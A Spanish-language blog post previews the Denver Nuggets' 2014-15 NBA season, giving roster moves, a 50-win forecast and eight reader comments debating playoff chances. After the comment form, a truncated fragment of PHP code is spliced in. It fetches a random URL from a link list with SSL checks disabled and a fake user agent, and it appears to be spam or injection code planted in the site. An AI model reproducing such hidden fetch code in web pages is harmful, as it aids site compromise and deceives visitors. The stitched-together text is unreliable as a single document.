Denver Nuggets 2014-2015: En busca de la felicidad

15 de October de 2014 por Simon

En eso andarán los aficionados de los Nuggets esta temporada, volver a ser felices con su equipo, que otrora divertía y ganaba muchos partidos y que hacía de su pabellón una cancha inexpugnable con esa combinación de altura, ritmo de juego y presión de los aficionados. Esta temporada, lograr esa felicidad parece relativamente sencillo, sólo necesitan una cosa: SALUD. Esa que no acompañó en ningún momento de la temporada pasada a casi ninguno de sus jugadores. Si consiguen mantener sana a toda la plantilla, los Nuggets vuelven a disponer de una de las plantillas más largas y de más calidad de la liga, por lo que los resultados deberían mejorar y parecerse a los que lograba Karl pues Shaw, tras muchos años esperando su alternativa, decepcionó un poco con un equipo que en muchos momentos carecía de una identidad definida.

Kenneth Faried

Movimientos clave

Un año más los Nuggets se han movido como pez en el agua en el mercado y han sacado oro a cambio de nada (que es lo que venían a representar para el equipo de Colorado Fournier y el pick 56 del pasado Draft). Así, a cambio de ese pack llega el que para muchos fue uno de los 5 mejores escoltas de la temporada pasada, el hijo pródigo, Arron Afflalo, que vuelve a Denver tras haber demostrado todo lo que se esperaba de él cuando salió. Con Afflalo llega una nueva vía de calidad para buscar aún más anotación a un equipo que con Gallinari, Lawson y la intensidad de los interiores no debería tener problemas para acercarse a los 110 puntos por noche.  El resto de la plantilla es la misma que la temporada pasada, a excepción de la llegada de otro escolta, Gary Harris, que llega desde Michigan para ser el suplente de Afflalo, uno de las promesas del Draft más seguras a priori, un anotador capaz de defender también; una especie de, precisamente, Arron Afflalo.

Qué esperamos de ellos

Pues vamos a apostar fuerte por estos Nuggets. No sé si es el corazón o es que son un equipo llamado a estar arriba de verdad  pero yo los veo en Playoffs la campaña que viene, a nada que sus principales jugadores les respeten las lesiones y Shaw encuentre la rotación adecuada para los interiores. Un quinteto Lawson, Afflalo, Gallinari, Faried y Hickson debería ser capaz de competir con cualquiera. Y el ritmo que impongan desde el banquillo jugadores como Nate Robinson, Gary Harris, Wilson Chandler y la intensidad que puedan ofrecer interiores solventes como Mozgov, Arthur o ¿McGee? pueden darle ese plus que les faltaba la temporada pasada.

Pronóstico

50 victorias. Playoffs. Primera ronda.

Plantilla

PG: Ty Lawson, Nate Robinson, Erick Green
SG: Arron Afflalo, Gary Harris, Randy Foye
SF: Danilo Gallinari, Wilson Chandler, Quincy Miller
PF: Kenneth Faried, Darrell Arthur
C: J.J. Hickson, Timofey Mozgov, JaVale McGee, Jusuf Nurkic.

Bajas: Evan Fournier (Orlando Magic)

Comenta

8 comentarios a esta entrada

  1. Denise dice:
    #1

    Bfff…50 victorias…asi a priori. creo que ni de coña. Necesitariamos ver a un McGee sano y en plan estelar, y a la mejor versión de gente como Robinson o Chandler. Si estas circunstancias no se dan, creo que les falta mucho banquillo y hay 6-7 mejores equipos en el Oeste si no tienen bajas.
    Clasificarse para PO como 8º ya lo consideraría un exitazo.

      Citar

  2. Jose A. Ramírez dice:
    #2

    Pues yo me voy a tirar a la piscina, que mu gustan mucho su forma de jugar y de estructura. Les doy entre 4 y 5 del oeste suponiendo que se mantengan sanos, claro esta. Me encanta la plantilla, de las mas completas sino la que mas, ahi ya entramos en el eterno debate de que necesitan una superestrella, por supuesto, pero a mi esos nuggets me molan y mucho. Peor suerte que el año pasado es imposible, y Shaw ya se deberia ver su sello, esto es defensa y mejor aprovechamiento del juego en estatico. Es un conjunto muy peligroso y con mucho talento, mejorado con un escolta de nivel que carecian. Las lesiones es la clave, coincido con el articulo

      Citar

  3. Vader dice:
    #3

    ¿No creeis que Mozgov será el titular?

      Citar

  4. rumbero dice:
    #4

    Me añado a esa corriente optimista. Difícil que tengan peor suerte que la temporada pasada. Para mi va a ser importante la aportación que puedan tener Mozgov y Mcgee en la pintura, porque el año pasado tuvieron bastantes problemas defensivos en la pintura con Faried y Hickson. Caudal ofensivo no les debería faltar, y este año si deberiamos ver la mano de Shaw.

      Citar

  5. Azabel dice:
    #5

    Yo tambien me siento tentado a meterlos en PO, pues no hay muchos equipos capaces de tener jugadores de 20 puntos por noche como lawson, afflalo, gallinari, chandler, robinson el propio harris y una bateria de internos tan larga y de calidad como faried, hickson, mozgov, mcgee y arthur

    Ahora hay q ver como se desempeñan juntos, potencial hay de sobra,

    Siempre fui de la idea q tantos buenos jugadores podrian entregar a dos o tres de ellos por uno muy bueno y aun asi tener un rotacion larga y de calidad, pero desde la salida de melo q denver apuesta a tener 11 o 12 jugadores de 6 o 7 puntos, sin tener uno de 9 de puntos, son decisiones y les ha salido mas bien q mal

      Citar

  6. TheDeerHunter dice:
    #6

    Pues sí, potencialmente son equipo de playoffs aunque aún se deben demostrar muchas cosas allí. Hay dudas… para empezar ver cómo defienden y si Shaw vale o es un bluffazo.
    No les doy tantas victorias pero seguro que van a pelear playoffs.

      Citar

  7. Nacho dice:
    #7

    Pues el año pasado 48 victorias se quedaron fuera. Yo no les doy ni una, ni otra.
    Y, ufff, es el Oeste. Salvaje. Mucho se dice del crecimiento del Este, pero… de los ocho de PO del año pasado, ¿a quien quitas? ¿Menphis? lo dudo. ¿Dallas?, Nowitzki es como el anuncio del coche, es alemán, no falla. Los otros seis como que no. Se les suma NOP en la contienda, ¿Phoenix seguirá maravillando y peleando? ¿la horda joven de Minnesota se liará a jugar sin presión?
    Chungo, chungo… pero no solo los Nuggets, si no todo el Oeste.
    La pelearán, pero…

      Citar

  8. portu dice:
    #8

    Mozgov empezará de titular casi seguro, creo recordar q JJ Hickson tenía algún problema físico, pero es q es lógico no empezar con un quinteto con un C de poco más de 2m como es Hickson (siendo faried tb “bajito” en comparación con otros PF). No soy tan optimista con ellos pq Afflalo siempre me ha parecido un jugador simplemente correcto, no sé si podrá repetir temporadón, luego está el tema lesionados, sobretodo Gallinari, pq a mcGee casi q lo doy por perdido… No sé, tengo dudas acerca de su nivel real, creo q son un equipo como Memphis, q estando a tope son duros de roer y equipos de playoffs, pero con un techo más bajo q los cocos del Oeste.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>